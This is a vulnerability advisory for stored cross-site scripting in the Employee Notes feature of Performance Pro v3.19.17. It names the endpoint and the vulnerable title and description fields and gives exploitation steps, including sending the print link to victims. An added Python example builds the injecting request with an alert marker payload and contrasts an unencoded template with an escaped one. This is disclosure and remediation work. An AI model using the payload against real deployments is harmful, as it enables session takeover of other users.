# Stored XSS - Employee Notes

## Stored XSS (authenticated)  <a href="#finding1" id="finding1"></a>

Performance Pro v3.19.17 and earlier is affected by multiple Stored Cross-Site Scripting (XSS) vulnerabilities (Persistent/Type II) via POST requests to the following endpoint:

{% hint style="warning" %}
/index.php?mode=mNote\&job=update
{% endhint %}

### Description

The application is vulnerable to multiple instances of stored (persistent) XSS in the Employee Notes functionality. Malicious input supplied by an authenticated user is stored server-side and later written into the page HTML without output encoding or sanitization. This allows execution of arbitrary JavaScript in the browser, and therefore the authenticated session, of any user who views the affected pages.

Vulnerable parameters:

* title – Stored and rendered unencoded on /index.php (Employee Notes title field) and on the print/view page /viewnote.php?id=\<id>.
* description – Stored and rendered unencoded on /viewnote.php?id=\<id> (generated when printing or viewing a note).

{% hint style="danger" %}
This vulnerability allows an attacker to execute arbitrary scripts in the victim's authenticated session, alter the user interface, and redirect users to malicious sites.
{% endhint %}

***

### Exploitation

* Inject malicious JavaScript into either the title or the description of an employee note
  * Title:
    * Once the note has been saved, the injected title executes whenever a user views the Employee Notes home page and also when the note is printed.
  * Description:
    * Once the note has been saved, the injected description executes only on the print/view page (/viewnote.php?id=\<id>). Printing the note generates that link, which the attacker can then share with other authenticated users.
* **Send** the generated print link to a victim via phishing, social engineering, or any other attack vector. For the title field no crafted link is needed: because the payload is stored, any authenticated user who opens the Employee Notes page is affected.
* When the victim opens the affected page, the application writes the stored input into the HTML without output encoding.
* **The victim's browser renders the injected payload**, allowing arbitrary script execution within the victim's authenticated session.
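The procedure above, as an added example that is not part of the original advisory and not the vendor's code. The endpoint (`/index.php?mode=mNote&job=update`), the `title` and `description` parameters and the `/viewnote.php?id=<id>` page come from this finding; the base URL `https://perfpro.example`, the `PHPSESSID` cookie name and the note id are placeholders, and the two `render_note_*` functions are stand-ins for the server-side template, written only to show the defect and its fix. Nothing is sent over the network: the POST is built but not transmitted, and the page bodies are constructed locally, so the block runs offline.

```python
"""Added example for the Employee Notes stored XSS (not the vendor's code).
Endpoint, parameter names and the view page come from the advisory; the base
URL, the cookie name PHPSESSID and the note id are assumptions/placeholders."""
import html
import re
import urllib.parse
import urllib.request

UPDATE_PATH = "/index.php?mode=mNote&job=update"   # from the advisory
VIEW_PATH = "/viewnote.php?id={note_id}"           # from the advisory

# Benign marker payload: alert(document.domain) proves execution in the app's
# origin without side effects, and its angle brackets make encoding easy to spot.
PAYLOAD = '<img src=x onerror="alert(document.domain)">'


def build_update_request(base_url, session_cookie, title, description):
    """Build (do not send) the authenticated POST that stores the note.

    session_cookie is the attacker's own session, e.g. 'PHPSESSID=...'
    (cookie-based sessions and the cookie name are assumptions).
    """
    body = urllib.parse.urlencode({"title": title, "description": description}).encode()
    req = urllib.request.Request(base_url.rstrip("/") + UPDATE_PATH, data=body, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    req.add_header("Cookie", session_cookie)
    return req


def view_url(base_url, note_id):
    """URL of the print/view page that renders the stored description."""
    return base_url.rstrip("/") + VIEW_PATH.format(note_id=note_id)


def _escaped_pattern(payload):
    """Regex matching the payload as an HTML encoder would emit it.  Accepts the
    quote entities produced by PHP htmlspecialchars and Python html.escape."""
    parts = []
    for ch in payload:
        if ch == "<":
            parts.append("&lt;")
        elif ch == ">":
            parts.append("&gt;")
        elif ch == "&":
            parts.append("&amp;")
        elif ch == '"':
            parts.append("(?:&quot;|&#34;|&#x22;)")
        elif ch == "'":
            parts.append("(?:&#39;|&#039;|&#x27;|&apos;|')")
        else:
            parts.append(re.escape(ch))
    return "".join(parts)


def classify_output(page_html, payload=PAYLOAD):
    """'raw'     = payload is in the page verbatim (exploitable)
    'encoded' = only its entity-encoded form appears (fixed)
    'absent'  = not found (wrong page, or a partial encoder: inspect by hand)"""
    if payload in page_html:
        return "raw"
    if re.search(_escaped_pattern(payload), page_html):
        return "encoded"
    return "absent"


def audit_pages(pages, payload=PAYLOAD):
    """Classify every fetched page body; pages maps a label to its HTML.
    Per the advisory the title lands on the home and print pages, the
    description only on the print page, so fetch and label both."""
    return {label: classify_output(body, payload) for label, body in pages.items()}


# Minimal stand-ins for the server-side template (assumption, not vendor code).
def render_note_vulnerable(title, description):
    """Reproduces the defect: user input concatenated into markup unencoded."""
    return f"<h2>{title}</h2><p>{description}</p>"


def render_note_fixed(title, description):
    """The fix: encode at the point of insertion into an HTML text context."""
    return f"<h2>{html.escape(title)}</h2><p>{html.escape(description)}</p>"


if __name__ == "__main__":
    req = build_update_request("https://perfpro.example", "PHPSESSID=attacker", "Q3 review", PAYLOAD)
    print(req.get_method(), req.full_url, req.data)
    # Constructed page bodies standing in for the real HTTP responses
    print(audit_pages({
        "home": render_note_vulnerable(PAYLOAD, "text"),
        "print": render_note_fixed("Q3 review", PAYLOAD),
    }))
```

In a live check, replace the constructed bodies with the responses for `/index.php` and for `view_url(base, id)` fetched with a second authenticated session; `raw` confirms the finding, `encoded` confirms the fix, and `absent` means the marker was altered (for example only `<` encoded, or the value truncated) and the page needs manual inspection.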

### Example 1 - Title XSS

* Create a new note\
  ![](https://2946459361-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGyD3p56S2Ma0Q756LEYJ%2Fuploads%2F5RVsJjAT4xSXfaXqM24L%2Fimage.png?alt=media\&token=3d211a24-5d3c-4d39-8622-b047714883ab)
* Inject a malicious XSS payload into the title and save\
  ![](https://2946459361-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGyD3p56S2Ma0Q756LEYJ%2Fuploads%2F2aamV7kw8hBi9rLqzd33%2Fimage.png?alt=media\&token=34068326-6c38-4d34-ad95-6d6235d02f4c)
* Click on the malicious title on the Employee Notes page\
  ![](https://2946459361-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGyD3p56S2Ma0Q756LEYJ%2Fuploads%2FqdraLhWiDra3BqzU3pMe%2Fimage.png?alt=media\&token=b7a60c94-ddc4-4d38-84bc-32e102b736d5)\
  ![](https://2946459361-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGyD3p56S2Ma0Q756LEYJ%2Fuploads%2FhUoD7f4N4bcNn31pisKc%2Fimage.png?alt=media\&token=124f3f0a-e40a-418d-91b9-9df14a3335e5)

### Example 2 - Description XSS

* Create a new note\
  ![](https://2946459361-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGyD3p56S2Ma0Q756LEYJ%2Fuploads%2Fr8PxV8Prae3xit6wf1pa%2Fimage.png?alt=media\&token=6ea93939-0080-4fc3-9e62-41c76c1770b1)
* Inject a malicious XSS payload into the description and save\
  ![](https://2946459361-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGyD3p56S2Ma0Q756LEYJ%2Fuploads%2F89tXFrtGPLI6n9u2W4Lx%2Fimage.png?alt=media\&token=88f3710e-54e3-4676-bd4c-429aae29587a)
* Print the employee note to generate a malicious link\
  ![](https://2946459361-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGyD3p56S2Ma0Q756LEYJ%2Fuploads%2FvkXRixW1w6yzKAPqkiwm%2Fimage.png?alt=media\&token=127de690-d24e-4721-817c-3f5654a5d5cb)
* Click on the malicious description\
  ![](https://2946459361-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGyD3p56S2Ma0Q756LEYJ%2Fuploads%2FxK2dwhlzhP6TYkDBc1op%2Fimage.png?alt=media\&token=8fceb3a5-3638-4a97-aeb1-66f4be1c5c02)
* *It is worth mentioning that on the print page the title is also exploitable and vulnerable to XSS; it is not limited to the description.*
